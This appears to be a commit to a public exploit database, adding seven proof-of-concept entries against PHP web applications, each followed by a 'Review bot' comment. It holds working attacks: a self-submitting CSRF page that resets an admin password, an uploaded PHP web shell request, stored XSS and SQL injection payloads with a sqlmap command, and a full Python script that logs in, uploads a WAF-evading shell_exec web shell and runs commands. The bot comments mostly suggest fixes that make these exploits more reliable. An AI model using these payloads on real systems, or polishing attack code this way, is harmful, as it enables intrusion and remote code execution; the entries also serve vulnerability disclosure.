DB: 2021-03-05
8 changes to exploits/shellcodes

e107 CMS 2.3.0 - CSRF
Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
This commit is contained in:
parent
5edc6a08e0
commit
5572674576
9 changed files with 334 additions and 0 deletions
@ -4,6 +4,7 @@
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79
# CVE: CVE-2020-23518

[Description]

70
exploits/php/webapps/49614.txt
Normal file
@ -0,0 +1,70 @@
# Exploit Title: e107 CMS 2.3.0 - CSRF
# Date: 04/03/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://e107.org
# Software Link: https://e107.org/download
# Version: 2.3.0
# Tested on: Windows 10
# CVE : CVE-2021-27885

CSRF vulnerability on e107 CMS

## Bug Description
Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.

## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF login POC using the following code.

```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
var count = 2;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}

</script>

<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>

<form method="POST" name="form0" action="
http://localhost/[path-to-e107-cms]/usersettings.php">

<input type="hidden" name="loginname" value="admin"/>
<input type="hidden" name="email" value="[email]"/>
<input type="hidden" name="password1" value="[password]"/>
<input type="hidden" name="password2" value="[password]"/>
<input type="hidden" name="hideemail" value="1"/>
<input type="hidden" name="image" value=""/>
<input type="hidden" name="signature" value=""/>
<input type="hidden" name="updatesettings" value="Save settings"/>
<input type="hidden" name="_uid" value="2"/>




</form>

</body>
</html>
```


2. Replace the email and password with the valid credentials.
3. Send the link script to the victim (admin) to make them click.
4. Login with new admin password
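Review bot: fireForms() loops with count = 2 but the page defines only one form (form0), so the second iteration dereferences document.forms[1], which is undefined, and throws a TypeError; the first submit() has already started the navigation so the PoC still fires, but count should be 1 (or document.forms.length). Two wording points in the same file: step 1 calls this a "CSRF login POC" although the forged request is a usersettings.php profile and password change, not a login, and step 2 should say the attacker-chosen email and password rather than "valid credentials", since nothing in the form is authenticated. The form carries no anti-CSRF token or other per-session value, which is what the PoC relies on; stating that explicitly, and naming the fixed version if one exists, would let readers verify the affected range.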
79
exploits/php/webapps/49615.txt
Normal file
@ -0,0 +1,79 @@
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
# Date: 04/03/2021
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10, XAMPP


Request:
========

POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
Gecko/20100101 Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------14955282031852449676680360880
Content-Length: 972
Origin: http://localhost
Connection: close
Referer: http://localhost/onlineordering/GPST/store/index.php
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
Upgrade-Insecure-Requests: 1

-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="transnum"

VAF-XAP
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select1"

25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="pname"

keychain
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select2"

1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="txtDisplay"

25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="note"

test
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo "Shell";system($_GET['cmd']); ?>
-----------------------------14955282031852449676680360880--

Response:
=========

HTTP/1.1 200 OK
Date: Thu, 04 Mar 2021 13:28:27 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 55
Connection: close
Content-Type: text/html; charset=UTF-8

<meta http-equiv="refresh" content="1; url=index.php">

# Uploaded Malicious File can be Found in :
onlineordering\GPST\store\design

# go to
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
which will execute hostname command.
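Review bot: the write-up never states whether the upload to store/initiateorder.php needs a logged-in session; the captured request carries a PHPSESSID cookie, and the companion entry 49618 for the same application is explicitly marked (Unauthenticated), so the title here should say one way or the other. The captured Content-Length: 972 is only valid for this exact body; anyone changing the filename or the PHP payload has to recompute it or drop the header and let the client set it. The response is just a meta refresh to index.php and gives no indication that the file was stored, so the only success check is the GET to store/design/shell.php?cmd=hostname; it is worth saying in the text that the server keeps the client-supplied name and .php extension, which is what makes that follow-up request work.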
18
exploits/php/webapps/49616.txt
Normal file
@ -0,0 +1,18 @@
# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-04
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://textpattern.com
# Software Link: https://textpattern.com/start
# Version: v 4.8.4
# Tested on: Windows

Steps-To-Reproduce:
1. Login into Textpattern CMS admin panel.
2. Now go to the *Content > C**omments > Message*.
3. Now paste the below payload in the URL field.

Ba1man”><img src=x onerror=confirm(document.location)>

4. Now click on the *Save* button.
5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head
5. The XSS will be triggered.
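Review bot: the payload line uses a right double quotation mark (U+201D) after Ba1man instead of the ASCII double quote, so if it is meant to break out of a quoted attribute it will not, and if it lands in body text the prefix does nothing; either way it should be `Ba1man"><img src=x onerror=confirm(document.location)>`. Step 2 navigates to Content > Comments > Message but step 3 says to paste into the URL field, so the injected field is ambiguous; step 2 also carries stray asterisks (`C**omments`) and two steps are both numbered 5. Since step 1 starts from an admin-panel login, the title should carry (Authenticated) like the other entries in this commit.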
18
exploits/php/webapps/49617.txt
Normal file
@ -0,0 +1,18 @@
# Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-04
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://textpattern.com
# Software Link: https://textpattern.com/start
# Version: v 4.9.0-dev
# Tested on: Windows

Steps-To-Reproduce:
1. Login into Textpattern CMS admin panel.
2. Now go to the *Content > Write > ** Excerpt*.
3. Now paste the below payload in the URL field.

Ba1man”><img src=x onerror=confirm(document.cookie)>

4. Now click on the *Save* button.
5. Now go to the *articles* page
5. The XSS will be triggered.
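Review bot: 4.9.0-dev is an unreleased development branch, so the header should record the commit or snapshot that was tested, otherwise the result cannot be reproduced; the same goes for `Tested on: Windows` with no version. The steps have the same defects as 49616: step 3 refers to a URL field although step 2 opens Content > Write > Excerpt, the payload's closing quote is U+201D rather than `"`, step 2 has stray asterisks, and two steps are numbered 5. The procedure starts from an admin-panel login, so the title should be marked (Authenticated).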
19
exploits/php/webapps/49618.txt
Normal file
@ -0,0 +1,19 @@
# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.

CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9
<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
--batch --dbs

3) Using the above command we will get the name of all the database.
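Review bot: the sqlmap command on the CMD line is broken by mail-client residue: a second copy of the URL in angle brackets with a trailing `*` sits between `-u .../design.php?id=9` and `--batch --dbs`, and sqlmap will reject it as an unexpected argument. The runnable form is `sqlmap -u "http://localhost/onlineordering/GPST/admin/design.php?id=9" --batch --dbs`, with the URL quoted because of the `?` and `=`. Step 1 proves the delay with id=12 while the header and the sqlmap line use id=9; harmless, but worth aligning. Because design.php lives under /admin/, the (Unauthenticated) claim in the title should be backed by a sentence stating that the page answers the injected request without a session cookie.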
18
exploits/php/webapps/49619.txt
Normal file
@ -0,0 +1,18 @@
# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
# Date: 04-03-2021
# Exploit Author: Deepak Kumar Bharti
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0

# Tested on: Windows 10 Pro
# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in Welcome page in quiz section eid parameter affected from this vulnerability.
# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

POC:
# go to url http://localhost/login.php
# then you have to login with default creds
# then go to quiz and execute the payload ie:--
http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
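Review bot: the PoC URL contains a literal single quote and unencoded spaces in the eid value; a browser address bar tolerates that, but curl, sqlmap or Burp Repeater will not, so give the encoded form (`eid=60377db362694'%20Union%20Select%201,database(),database(),4,5--%20-`) or say that it must be encoded. "Login with default creds" is not reproducible as written because the file never says what those credentials are or where they come from. The URLs are rooted at http://localhost/welcome.php, so either the application is assumed to sit at the web root or the install path is missing; say which. The UNION uses five columns with database() in positions 2 and 3, presumably because those two are the ones reflected in the quiz page; a one-line note on how the column count was established would make the PoC self-contained.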
104
exploits/php/webapps/49620.py
Executable file
@ -0,0 +1,104 @@
# Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
# Date: 03/03/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/start
# Version: Previous to 4.8.3
# Tested on: CentOS, textpattern 4.5.7 and 4.6.0
# Install dependencies: pip3 install beautifulsoup4 argparse requests
# Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d

import sys
import argparse
import requests
from bs4 import BeautifulSoup


def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
parser.add_argument('-u', '--user', required=True, action='store', help='Username')
parser.add_argument('-p', '--password', required=True, action='store', help='Password')
parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute')
parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload')
parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command')
my_args = parser.parse_args()
return my_args


def get_file_id(s, files_url, file_name):
r = s.get(files_url, verify=False)
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.findAll('a'):
if "file_download/" in a['href']:
file_id_name = a['href'].split('file_download/')[1].split("/")
if file_id_name[1] == file_name:
file_id = file_id_name[0]
return file_id


def login(login_url, user, password):
s = requests.Session()
s.get(login_url, verify=False)
data = {"p_userid":user, "p_password":password, "_txp_token":""}
r = s.post(login_url, data=data, verify=False)
if str(r.status_code) == "401":
print("[+] Invalid credentials")
sys.exit(0)
_txp_token = ""
soup = BeautifulSoup(r.text, "html.parser")
fields = soup.findAll('input')
for f in fields:
if (f['name'] == "_txp_token"):
_txp_token = f['value']
return s,_txp_token


def upload(s, login_url, _txp_token, file_name):
php_payload = '<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n'*1000 # to avoid WAF problems
php_payload += '<?php $test = shell_exec($_REQUEST[\'cmd\']); echo $test; ?>'
s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False)


def exec_cmd(s, cmd_url, command):
r = s.get(cmd_url+command, verify=False)
response = r.text.replace("<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n","")
return response


def delete_file(s, login_url, file_id, _txp_token):
data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token}
s.post(login_url, data=data, verify=False)


def main():
args = get_args()
url = args.target
user = args.user
password = args.password
file_name = args.filename
command = args.command
delete_after_execute = args.delete

login_url = url + "/textpattern/index.php"
upload_url = url + "/textpattern/index.php"
cmd_url = url + "/files/" + file_name + "?cmd="
files_url = url + "/textpattern/index.php?event=file"

s,_txp_token = login(login_url, user, password)
print("[+] Logged in")
upload(s, login_url, _txp_token, file_name)
file_id = get_file_id(s, files_url, file_name)
print("[+] File uploaded with id %s"%(file_id))
response = exec_cmd(s, cmd_url, command)
print("[+] Command output \n%s"%(response))

if delete_after_execute:
print("[+] Deleting uploaded file %s with id %s" %(file_name, file_id))
delete_file(s, login_url, file_id, _txp_token)
else:
print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name))


if __name__ == "__main__":
main()
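Review bot: exec_cmd() appends the raw command to `?cmd=` without URL encoding, so a command containing `&`, `#`, `+` or `%` is cut or mangled by the URL parser before it reaches shell_exec; build cmd_url without the `?cmd=` suffix and call `s.get(cmd_url, params={"cmd": command})` so requests encodes it. login() treats only a 401 as failure; any other failure mode (a redirect, a lockout page, or a 200 that just re-renders the login form) leaves `_txp_token` as the empty string, after which the script prints "Logged in" and attempts an upload that cannot succeed, so check for the presence of the token rather than the status code. get_file_id() returns None when the filename is not in the file list, which main() then prints as the id and later sends in `selected[]` to the delete step; fail early there. The header is also inconsistent with itself: the title says 4.8.3, the Version line says "Previous to 4.8.3" and testing was done on 4.5.7 and 4.6.0, so the affected range should be written as < 4.8.3 in both the title and the index entry.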
@ -43800,3 +43800,10 @@ id,file,description,date,author,type,platform,port
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,
49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",2021-03-04,Tadjmen,webapps,php,
49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution",2021-03-04,"Suraj Bhosale",webapps,php,
49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,
49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,
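Review bot: the index row for 49620 repeats the title's "Textpattern 4.8.3" while the file header says the affected versions are previous to 4.8.3 (tested on 4.5.7 and 4.6.0); the description should read < 4.8.3 so the index does not suggest that 4.8.3 itself is vulnerable. Rows 49616 and 49617 describe procedures that begin with an admin-panel login but lack the (Authenticated) marker that 49619 and 49620 carry, and 49619 spells "Sql Injection" where 49618 and 49610 use "SQL"; anyone grepping the CSV by marker or keyword will miss these.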